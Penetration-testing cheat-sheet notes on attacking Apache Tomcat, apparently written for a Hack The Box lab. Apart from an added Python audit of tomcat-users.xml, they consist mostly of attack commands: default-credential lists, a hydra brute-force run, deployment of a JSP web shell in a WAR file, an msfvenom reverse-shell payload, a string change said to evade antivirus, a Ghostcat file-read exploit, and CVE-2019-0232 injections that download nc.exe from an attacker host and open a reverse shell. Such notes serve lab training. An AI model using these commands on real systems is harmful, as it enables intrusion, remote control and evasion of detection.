Tomcat
General folder structure of a Tomcat installation
├── bin
├── conf
│   ├── catalina.policy
│   ├── catalina.properties
│   ├── context.xml
│   ├── tomcat-users.xml
│   ├── tomcat-users.xsd
│   └── web.xml
├── lib
├── logs
├── temp
├── webapps
│   ├── manager
│   │   ├── images
│   │   ├── META-INF
│   │   └── WEB-INF
│   │       └── web.xml
│   └── ROOT
│       └── WEB-INF
└── work
    └── Catalina
        └── localhost
The bin folder stores scripts and binaries needed to start and run a Tomcat server.
The conf folder stores various configuration files used by Tomcat. The tomcat-users.xml file stores user credentials and their assigned roles.
The lib folder holds the various JAR files needed for the correct functioning of Tomcat. The logs and temp folders store temporary log files.
The webapps folder is the default webroot of Tomcat and hosts all the applications.
The work folder acts as a cache and is used to store data during runtime.
Each folder inside webapps is expected to have the following structure.
webapps/customapp
├── images
├── index.jsp
├── META-INF
│   └── context.xml
├── status.xsd
└── WEB-INF
    ├── jsp
    │   └── admin.jsp
    ├── web.xml
    ├── lib
    │   └── jdbc_drivers.jar
    └── classes
        └── AdminServlet.class
The most important file among these is WEB-INF/web.xml, which stores information about the routes used by the application and the classes handling these routes. Any vulnerability in these files can lead to total compromise of the website.
Discovery/Footprinting
Tomcat Version

#Get tomcat version
Intrusionz3r0@htb[/htb]$ curl -s http://app-dev.inlanefreight.local:8080/docs/ | grep Tomcat
Default Credentials
The /manager/html directory is particularly sensitive as it allows the upload and deployment of WAR files, which can lead to code execution. This directory is protected by basic HTTP authentication, with common credentials being:
admin:admin
tomcat:tomcat
admin:
admin:s3cr3t
tomcat:s3cr3t
admin:tomcat
Wordlist:
/usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt
/usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt
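Since conf/tomcat-users.xml is where these accounts and their roles live, the same default list can be turned into a quick audit of a server's own config. The script below is an added example, not part of the original notes: it parses a constructed tomcat-users.xml sample and flags accounts that use one of the default pairs above, a default password on a Manager/Host-Manager role, or an empty password.

```python
import xml.etree.ElementTree as ET

# Default username:password pairs listed above; any match is one guess away from /manager/html.
DEFAULT_PAIRS = {("admin", "admin"), ("tomcat", "tomcat"), ("admin", ""),
                 ("admin", "s3cr3t"), ("tomcat", "s3cr3t"), ("admin", "tomcat")}
DEFAULT_PASSWORDS = {p for _, p in DEFAULT_PAIRS}
# Roles that unlock the Manager (/manager) and Host Manager (/host-manager) apps.
PRIVILEGED_ROLES = {"manager-gui", "manager-script", "manager-jmx", "manager-status",
                    "admin-gui", "admin-script"}

# Constructed sample of conf/tomcat-users.xml (not taken from a real server).
SAMPLE_TOMCAT_USERS = """
<tomcat-users xmlns="http://tomcat.apache.org/xml" version="1.0">
  <role rolename="manager-gui"/>
  <role rolename="manager-script"/>
  <user username="tomcat" password="s3cr3t" roles="manager-gui,admin-gui"/>
  <user username="ops" password="tomcat" roles="manager-script"/>
  <user username="deploy" password="rV7#pq2Lx9!mZ4" roles="manager-script"/>
  <user username="guest" password="" roles=""/>
</tomcat-users>
"""


def _local_name(tag):
    """Strip the http://tomcat.apache.org/xml namespace that ElementTree prefixes onto tags."""
    return tag.rsplit("}", 1)[-1]


def audit_tomcat_users(xml_text):
    """Return (username, issue, privileged-roles) tuples for risky <user> entries."""
    findings = []
    for el in ET.fromstring(xml_text).iter():
        if _local_name(el.tag) != "user":
            continue
        name = el.get("username") or el.get("name") or ""   # older releases used name=
        password = el.get("password") or ""
        roles = {r.strip() for r in (el.get("roles") or "").split(",") if r.strip()}
        privileged = ",".join(sorted(roles & PRIVILEGED_ROLES))
        if (name, password) in DEFAULT_PAIRS:
            findings.append((name, "default credentials", privileged))
        elif privileged and password in DEFAULT_PASSWORDS:
            findings.append((name, "default password", privileged))
        elif password == "":
            findings.append((name, "empty password", privileged))
    return findings


if __name__ == "__main__":
    for user, issue, roles in audit_tomcat_users(SAMPLE_TOMCAT_USERS):
        print(f"{user}: {issue}" + (f" (roles: {roles})" if roles else ""))
```

Point it at a real conf/tomcat-users.xml by reading the file into audit_tomcat_users; the deploy account with a non-default password is deliberately not reported.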
#Brute force attack (the user list must be the users file, not the combined userpass file)
Intrusionz3r0@htb[/htb]$ hydra -L /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt -P /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt -f web01.inlanefreight.local http-get /manager/html
Bruteforce Script
https://github.com/b33lz3bub-1/Tomcat-Manager-Bruteforce
Tomcat Manager - WAR File Upload
Intrusionz3r0@htb[/htb]$ wget https://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/jsp/cmd.jsp
Intrusionz3r0@htb[/htb]$ zip -r backup.war cmd.jsp
#After deploying backup.war through the Manager app, the shell is reachable under /backup/
Intrusionz3r0@htb[/htb]$ curl -s 'http://web01.inlanefreight.local:8180/backup/cmd.jsp?cmd=ls'
Using msfvenom to create a .war file. (The cmd.jsp web shell as-is is only detected by 2/58 anti-virus vendors.)
Intrusionz3r0@htb[/htb]$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.15 LPORT=4443 -f war > backup.war
A simple change such as changing:
FileOutputStream(f);stream.write(m);o="Uploaded:
to:
FileOutputStream(f);stream.write(m);o="uPlOaDeD:
results in 0/58 security vendors flagging the cmd.jsp file as malicious at the time of writing.
CVE-2020-1938 : Ghostcat
All Tomcat versions before 9.0.31, 8.5.51, and 7.0.100 were found vulnerable. The flaw is in the AJP connector (port 8009 in the command below), so an instance that does not expose AJP is not reachable this way; the fixed versions ship with the connector disabled by default and refuse to start it without a shared secret.
https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi
Intrusionz3r0@htb[/htb]$ python2.7 tomcat-ajp.lfi.py app-dev.inlanefreight.local -p 8009 -f WEB-INF/web.xml
Apache Tomcat: Important: Remote Code Execution on Windows (CVE-2019-0232)
Affected versions
9.0.0.M1 to 9.0.17
8.5.0 to 8.5.39
7.0.0 to 7.0.93
Intrusionz3r0@htb[/htb]$ ffuf -c -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://10.129.47.188:8080/cgi/FUZZ.bat -t 300 -ic
Intrusionz3r0@htb[/htb]$ curl 'http://10.129.132.157:8080/cgi/cmd.bat?&c%3a\Windows\System32\certutil.exe+-urlcache+-split+-f+http%3a//10.10.14.33/nc.exe'
Intrusionz3r0@htb[/htb]$ curl 'http://10.129.132.157:8080/cgi/cmd.bat?&nc.exe+-e+cmd.exe+10.10.14.33+1234'